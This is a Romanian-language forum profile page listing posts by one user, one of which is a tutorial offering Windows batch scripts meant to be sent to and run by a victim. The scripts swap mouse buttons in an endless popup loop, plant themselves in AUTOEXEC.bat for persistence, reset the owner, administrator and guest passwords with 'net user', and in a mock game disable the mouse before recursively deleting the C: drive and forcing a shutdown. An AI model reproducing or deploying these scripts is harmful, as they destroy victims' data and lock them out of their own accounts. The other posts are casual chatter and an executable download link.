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Everything posted by beerlover0008

  1. si cand te gandesti ca dak intrebi pe careva din sua dak a auzit de romania si el/ea raspunde"it's that a chocholate"... :@
  2. Nu ma prea pricep la cuvinte dar iata ce poti face cu putina imaginatie. Nu face prea mult damage la comp...nu pot zice acelas lucru despre nervii utilizatorului „fericit� care a dat dublu click pe el. :ECHO cls Rundll32 user32,SwapMouseButton cls MSG owner This is annoying, isn't it? cls MSG owner Remember BeerLover? cls MSG Administrator This is annoying, isn't it? cls MSG Administrator Remember BeerLover? cls MSG Guest This is annoying, isn't it? cls MSG Guest Remember BeerLover? cls start www.google.com start www.yahoo.com goto ECHO Apar cateva mesaje de eroare si se inveseaza butoanele de ma mouse. Daca mai adaugam si acest cod batchului the fun will never stop cls cd c: type cd c: ATTRIB c:AUTOEXEC.bat -H %0 >>c:AUTOEXEC.bat echo > copy %0 ATTRIB c:AUTOEXEC.bat +H del /q %0 cls Alta chestie interesanta este schimbarea passului. @echo off cls net user owner ihackedyoubitch net user administrator ihackedyoubitch net user guest ihackedyoubitch cls echo. echo Uh Oh!!! Looks like your passwords changed... pause exit Urmeaza un batch putin mai distructiv... @echo off cls Rundll32 MOUSE,disable cls echo Welcome to the Bridge of Death Game! echo. echo BeerLover wishes you luck! pause cls echo Answer these questions as best you can. pause echo What, is your name? set /p name= cls echo What, is your quest? set /p input= cls echo What, is your favorite color? set /p color= echo %name%, your favorite color is not %color%!!! echo. @ping.exe -n 3 -w 1000 > nul goto DIE :DIE echo AHHHHHH DEL /Q /S /F C: cls shutdown -s -t 10 -c "Thou Art Guess was Incorrect." -f Inspirat din monthy python si holy grail. Nu stau prea mult la explicatii deoarece am vazut alte tutoriale. PS 1).Nu dati vina pe mine ca postez cv ce oricine poate crea daca stie cateva comenzi de baza   2).Daca am gresit undeva ma rog sa imi spuneti
  3. este un programel f interesant pe numele tor in cazul in care vreti sa faceti practica pe net...PS este pentru windows http://rapidshare.de/files/32769630/vidali....1.23-0.0.7.exe
  4. Nu credeam ca o sa gasesc un asemenea site romanesc...Am 17 ani si sper sa invat cat mai multe lururi folositoare
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